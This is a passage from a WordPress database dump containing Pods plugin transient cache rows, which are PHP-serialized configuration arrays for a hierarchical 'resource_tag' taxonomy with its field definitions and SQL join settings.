";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:16:\"term_taxonomy_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:16:\"term_taxonomy_id\";s:5:\"label\";s:16:\"Term Taxonomy ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"term_group\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"term_group\";s:5:\"label\";s:10:\"Term Group\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:5:\"group\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:5:\"count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:5:\"count\";s:5:\"label\";s:5:\"Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}s:9:\"object_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"object_id\";s:5:\"label\";s:9:\"Object ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}s:10:\"term_order\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"term_order\";s:5:\"label\";s:10:\"Term Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}}','off'),(5634483,'_transient_timeout_pods_147e4e20b578017dc894f720e1eb2f17','1782377875','off'),(5634484,'_transient_pods_147e4e20b578017dc894f720e1eb2f17','a:28:{s:11:\"object_type\";s:8:\"taxonomy\";s:4:\"type\";s:8:\"taxonomy\";s:11:\"object_name\";s:12:\"resource_tag\";s:19:\"object_hierarchical\";b:1;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_terms\";s:10:\"meta_table\";s:11:\"wp_termmeta\";s:9:\"pod_table\";s:20:\"wp_pods_resource_tag\";s:8:\"field_id\";s:7:\"term_id\";s:11:\"field_index\";s:4:\"name\";s:10:\"field_slug\";s:4:\"slug\";s:10:\"field_type\";s:8:\"taxonomy\";s:12:\"field_parent\";s:6:\"parent\";s:19:\"field_parent_select\";s:13:\"`tt`.`parent`\";s:13:\"meta_field_id\";s:7:\"term_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:2:{s:2:\"tt\";s:70:\"LEFT JOIN `wp_term_taxonomy` AS `tt` ON `tt`.`term_id` = `t`.`term_id`\";s:2:\"tr\";s:94:\"LEFT JOIN `wp_term_relationships` AS `tr` ON `tr`.`term_taxonomy_id` = `tt`.`term_taxonomy_id`\";}s:5:\"where\";a:1:{s:11:\"tt.taxonomy\";s:32:\"`tt`.`taxonomy` = \'resource_tag\'\";}s:13:\"where_default\";N;s:7:\"orderby\";s:25:\"`t`.`name`, `t`.`term_id`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:67:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:9:\"post_type\";s:4:\"name\";s:12:\"resource_tag\";s:2:\"id\";i:413;s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:13:\"Resource Tags\";s:11:\"description\";s:0:\"\";s:6:\"weight\";i:0;s:25:\"_elementor_controls_usage\";a:0:{}s:14:\"label_singular\";s:12:\"Resource Tag\";s:6:\"public\";s:1:\"1\";s:7:\"show_ui\";s:1:\"1\";s:12:\"hierarchical\";s:1:\"1\";s:4:\"type\";s:8:\"taxonomy\";s:7:\"storage\";s:4:\"meta\";s:8:\"old_name\";s:12:\"resource_tag\";s:7:\"rewrite\";s:1:\"1\";s:18:\"rewrite_with_front\";s:1:\"1\";s:20:\"rewrite_hierarchical\";s:1:\"1\";s:15:\"capability_type\";s:7:\"default\";s:22:\"capability_type_custom\";s:12:\"resource_tag\";s:9:\"query_var\";s:1:\"0\";s:4:\"sort\";s:1:\"0\";s:36:\"built_in_post_types_amn_wpforms-lite\";s:1:\"0\";s:30:\"built_in_post_types_custom_css\";s:1:\"0\";s:39:\"built_in_post_types_customize_changeset\";s:1:\"0\";s:32:\"built_in_post_types_elementor-hf\";s:1:\"0\";s:37:\"built_in_post_types_elementor_library\";s:1:\"0\";s:37:\"built_in_post_types_jet-smart-filters\";s:1:\"0\";s:38:\"built_in_post_types_ocean_modal_window\";s:1:\"0\";s:38:\"built_in_post_types_ocean_posts_slider\";s:1:\"0\";s:35:\"built_in_post_types_oceanwp_library\";s:1:\"0\";s:32:\"built_in_post_types_oembed_cache\";s:1:\"0\";s:24:\"built_in_post_types_page\";s:1:\"0\";s:24:\"built_in_post_types_post\";s:1:\"0\";s:32:\"built_in_post_types_user_request\";s:1:\"0\";s:28:\"built_in_post_types_wp_block\";s:1:\"0\";s:27:\"built_in_post_types_wpforms\";s:1:\"0\";s:31:\"built_in_post_types_wpforms_log\";s:1:\"0\";s:30:\"built_in_post_types_attachment\";s:1:\"0\";s:12:\"show_in_menu\";s:1:\"1\";s:13:\"menu_location\";s:7:\"default\";s:13:\"menu_position\";s:1:\"0\";s:17:\"show_in_nav_menus\";s:1:\"1\";s:13:\"show_tagcloud\";s:1:\"1\";s:21:\"show_tagcloud_in_edit\";s:1:\"1\";s:18:\"show_in_quick_edit\";s:1:\"1\";s:17:\"show_admin_column\";s:1:\"0\";s:11:\"pfat_enable\";s:1:\"0\";s:21:\"pfat_run_outside_loop\";s:1:\"0\";s:19:\"pfat_append_archive\";s:6:\"append\";s:11:\"rest_enable\";s:1:\"0\";s:8:\"read_all\";s:1:\"0\";s:9:\"write_all\";s:1:\"0\";s:33:\"built_in_post_types_related_topic\";s:1:\"1\";s:32:\"built_in_post_types_epa_resource\";s:1:\"1\";s:32:\"built_in_post_types_epa_document\";s:1:\"1\";s:28:\"built_in_post_types_document\";s:1:\"1\";s:33:\"built_in_post_types_news_resource\";s:1:\"1\";s:36:\"built_in_post_types_project_resource\";s:1:\"1\";s:33:\"built_in_post_types_related_theme\";s:1:\"1\";s:31:\"built_in_post_types_institution\";s:1:\"0\";s:33:\"built_in_post_types_inst_resource\";s:1:\"0\";s:32:\"built_in_post_types_mea_resource\";s:1:\"1\";s:36:\"built_in_post_types_knowledge_broker\";s:1:\"0\";s:33:\"built_in_post_types_ekms_bulletin\";s:1:\"0\";}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:11:{s:7:\"term_id\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"term_id\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:2:{i:0;s:2:\"id\";i:1;s:2:\"ID\";}s:20:\"hide_in_default_form\";b:1;}s:4:\"name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"name\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:5:\"title\";}}s:4:\"slug\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"slug\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:9:\"permalink\";}}s:11:\"description\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"description\";s:5:\"label\";s:11:\"Description\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:8:\"taxonomy\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"taxonomy\";s:5:\"label\";s:8:\"Taxonomy\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}}s:6:\"parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:16:\"term_taxonomy_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:16:\"term_taxonomy_id\";s:5:\"label\";s:16:\"Term Taxonomy ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"term_group\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"term_group\";s:5:\"label\";s:10:\"Term Group\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:5:\"group\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:5:\"count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:5:\"count\";s:5:\"label\";s:5:\"Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}s:9:\"object_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"object_id\";s:5:\"label\";s:9:\"Object ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}s:10:\"term_order\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"term_order\";s:5:\"label\";s:10:\"Term Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;s:5:\"alias\";a:0:{}}}}','off'),(5634485,'_transient_timeout_pods_c03fcde312c2e788523edfc6abef7d6a','1782377875','off'),(5634486,'_transient_pods_c03fcde312c2e788523edfc6abef7d6a','a:28:{s:11:\"object_type\";s:8:\"taxonomy\";s:4:\"type\";s:8:\"taxonomy\";s:11:\"object_name\";s:12:\"resource_tag\";s:19:\"object_hierarchical\";b:1;s:7:\"storage\";s:4:\"meta\";s:5:\"table\";s:8:\"wp_terms\";s:10:\"meta_table\";s:11:\"wp_termmeta\";s:9:\"pod_table\";s:20:\"wp_pods_resource_tag\";s:8:\"field_id\";s:7:\"term_id\";s:11:\"field_index\";s:4:\"name\";s:10:\"field_slug\";s:4:\"slug\";s:10:\"field_type\";s:8:\"taxonomy\";s:12:\"field_parent\";s:6:\"parent\";s:19:\"field_parent_select\";s:13:\"`tt`.`parent`\";s:13:\"meta_field_id\";s:7:\"term_id\";s:16:\"meta_field_index\";s:8:\"meta_key\";s:16:\"meta_field_value\";s:10:\"meta_value\";s:12:\"pod_field_id\";s:2:\"id\";s:15:\"pod_field_index\";s:4:\"name\";s:14:\"pod_field_slug\";N;s:16:\"pod_field_parent\";N;s:4:\"join\";a:2:{s:2:\"tt\";s:70:\"LEFT JOIN `wp_term_taxonomy` AS `tt` ON `tt`.`term_id` = `t`.`term_id`\";s:2:\"tr\";s:94:\"LEFT JOIN `wp_term_relationships` AS `tr` ON `tr`.`term_taxonomy_id` = `tt`.`term_taxonomy_id`\";}s:5:\"where\";a:1:{s:11:\"tt.taxonomy\";s:32:\"`tt`.`taxonomy` = \'resource_tag\'\";}s:13:\"where_default\";N;s:7:\"orderby\";s:25:\"`t`.`name`, `t`.`term_id`\";s:3:\"pod\";O:16:\"Pods\\Whatsit\\Pod\":1:{s:7:\"\0*\0args\";a:67:{s:11:\"object_type\";s:3:\"pod\";s:19:\"object_storage_type\";s:9:\"post_type\";s:4:\"name\";s:12:\"resource_tag\";s:2:\"id\";i:413;s:6:\"parent\";s:0:\"\";s:5:\"group\";s:0:\"\";s:5:\"label\";s:13:\"Resource Tags\";s:11:\"description\";s:0:\"\";s:6:\"weight\";i:0;s:25:\"_elementor_controls_usage\";a:0:{}s:14:\"label_singular\";s:12:\"Resource Tag\";s:6:\"public\";s:1:\"1\";s:7:\"show_ui\";s:1:\"1\";s:12:\"hierarchical\";s:1:\"1\";s:4:\"type\";s:8:\"taxonomy\";s:7:\"storage\";s:4:\"meta\";s:8:\"old_name\";s:12:\"resource_tag\";s:7:\"rewrite\";s:1:\"1\";s:18:\"rewrite_with_front\";s:1:\"1\";s:20:\"rewrite_hierarchical\";s:1:\"1\";s:15:\"capability_type\";s:7:\"default\";s:22:\"capability_type_custom\";s:12:\"resource_tag\";s:9:\"query_var\";s:1:\"0\";s:4:\"sort\";s:1:\"0\";s:36:\"built_in_post_types_amn_wpforms-lite\";s:1:\"0\";s:30:\"built_in_post_types_custom_css\";s:1:\"0\";s:39:\"built_in_post_types_customize_changeset\";s:1:\"0\";s:32:\"built_in_post_types_elementor-hf\";s:1:\"0\";s:37:\"built_in_post_types_elementor_library\";s:1:\"0\";s:37:\"built_in_post_types_jet-smart-filters\";s:1:\"0\";s:38:\"built_in_post_types_ocean_modal_window\";s:1:\"0\";s:38:\"built_in_post_types_ocean_posts_slider\";s:1:\"0\";s:35:\"built_in_post_types_oceanwp_library\";s:1:\"0\";s:32:\"built_in_post_types_oembed_cache\";s:1:\"0\";s:24:\"built_in_post_types_page\";s:1:\"0\";s:24:\"built_in_post_types_post\";s:1:\"0\";s:32:\"built_in_post_types_user_request\";s:1:\"0\";s:28:\"built_in_post_types_wp_block\";s:1:\"0\";s:27:\"built_in_post_types_wpforms\";s:1:\"0\";s:31:\"built_in_post_types_wpforms_log\";s:1:\"0\";s:30:\"built_in_post_types_attachment\";s:1:\"0\";s:12:\"show_in_menu\";s:1:\"1\";s:13:\"menu_location\";s:7:\"default\";s:13:\"menu_position\";s:1:\"0\";s:17:\"show_in_nav_menus\";s:1:\"1\";s:13:\"show_tagcloud\";s:1:\"1\";s:21:\"show_tagcloud_in_edit\";s:1:\"1\";s:18:\"show_in_quick_edit\";s:1:\"1\";s:17:\"show_admin_column\";s:1:\"0\";s:11:\"pfat_enable\";s:1:\"0\";s:21:\"pfat_run_outside_loop\";s:1:\"0\";s:19:\"pfat_append_archive\";s:6:\"append\";s:11:\"rest_enable\";s:1:\"0\";s:8:\"read_all\";s:1:\"0\";s:9:\"write_all\";s:1:\"0\";s:33:\"built_in_post_types_related_topic\";s:1:\"1\";s:32:\"built_in_post_types_epa_resource\";s:1:\"1\";s:32:\"built_in_post_types_epa_document\";s:1:\"1\";s:28:\"built_in_post_types_document\";s:1:\"1\";s:33:\"built_in_post_types_news_resource\";s:1:\"1\";s:36:\"built_in_post_types_project_resource\";s:1:\"1\";s:33:\"built_in_post_types_related_theme\";s:1:\"1\";s:31:\"built_in_post_types_institution\";s:1:\"0\";s:33:\"built_in_post_types_inst_resource\";s:1:\"0\";s:32:\"built_in_post_types_mea_resource\";s:1:\"1\";s:36:\"built_in_post_types_knowledge_broker\";s:1:\"0\";s:33:\"built_in_post_types_ekms_bulletin\";s:1:\"0\";}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:11:{s:7:\"term_id\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"term_id\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:2:{i:0;s:2:\"id\";i:1;s:2:\"ID\";}s:20:\"hide_in_default_form\";b:1;}s:4:\"name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"name\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:5:\"title\";}}s:4:\"slug\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"slug\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:9:\"permalink\";}}s:11:\"description\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"description\";s:5:\"label\";s:11:\"Description\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:8:\"taxonomy\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"taxonomy\";s:5:\"label\";s:8:\"Taxonomy\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}}s:6:\"parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:16:\"term_taxonomy_id\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:16:\"term_taxonomy_id\";s:5:\"label\";s:16:\"Term Taxonomy 